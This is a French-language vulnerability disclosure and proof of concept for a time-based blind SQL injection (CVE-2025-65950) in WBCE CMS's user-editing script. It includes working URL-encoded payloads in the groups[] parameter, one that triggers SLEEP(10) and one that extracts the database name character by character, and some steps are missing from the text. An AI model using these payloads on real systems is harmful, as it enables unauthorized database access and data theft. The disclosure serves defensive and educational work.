
Preuve de concept d'exploitation pour une vulnérabilité critique d'injection SQL aveugle basée sur le temps dans WBCE CMS, permettant aux utilisateurs à faibles privilèges d'exécuter des requêtes SQL arbitraires et d'exfiltrer le contenu de la base de données.
| Champ | Détails |
|---|
| ID CVE | CVE-2025-65950 |
| Gravité | CRITIQUE |
| Avis | Voir l'avis |
| Découvert par | Lukasz Rybak |
Une vulnérabilité critique d'injection SQL dans le module de gestion des utilisateurs permet à un utilisateur authentifié avec des privilèges faibles, disposant des autorisations de modification des utilisateurs, d'exécuter des requêtes SQL arbitraires. Cela peut être escaladé en un compromis total de la base de données, une exfiltration de données, contournant ainsi tous les contrôles de sécurité.
La vulnérabilité existe dans le script admin/users/save.php, qui gère les mises à jour des profils utilisateur. Le script traite incorrectement le paramètre groups[] envoyé depuis le formulaire d'édition des utilisateurs.
La preuve de concept consiste à utiliser une injection SQL aveugle basée sur le temps pour confirmer l'exécution de SQL arbitraire.
users_modify). Cet utilisateur n'a pas besoin d'être un administrateur complet.
Étapes de reproduction :
a. Connectez-vous en tant qu'utilisateur à privilèges faibles. b. Naviguez vers "Access" -> "Users" et sélectionnez un utilisateur à modifier.



d. Modifiez le paramètre `groups[]` avec la charge utile encodée en URL suivante, qui tentera de faire attendre la base de données pendant 10 secondes : groups%5B%5D=2%27+%2C+%60active%60+%3D+SLEEP(10)+--+
*(Charge utile décodée : 2' , `active` = SLEEP(10) -- )*
f. Envoyez la requête modifiée.
3. Vérification :

Exemple d'exfiltration de données : Récupération du nom de la base de données
**Exemple de charge utile pour tester un caractère :**
groups%5B%5D=2%27+%2C+%60active%60+%3D+IF(SUBSTRING(DATABASE()%2C+1%2C+1)+%3D+%27w%27%2C+SLEEP(5)%2C+0)+--+
Ce processus manuel peut être poursuivi pour révéler le nom complet de la base de données et, par la suite, toute autre donnée dans la base de données.


Un utilisateur à faibles privilèges, qui ne devrait pouvoir effectuer que des modifications bénignes sur les profils utilisateur, peut obtenir un contrôle total sur la base de données.
L'impact comprend, sans s'y limiter :
Ce CVE a été divulgué de manière responsable conformément aux pratiques de divulgation coordonnée des vulnérabilités. Les informations fournies ici sont uniquement à des fins éducatives et défensives.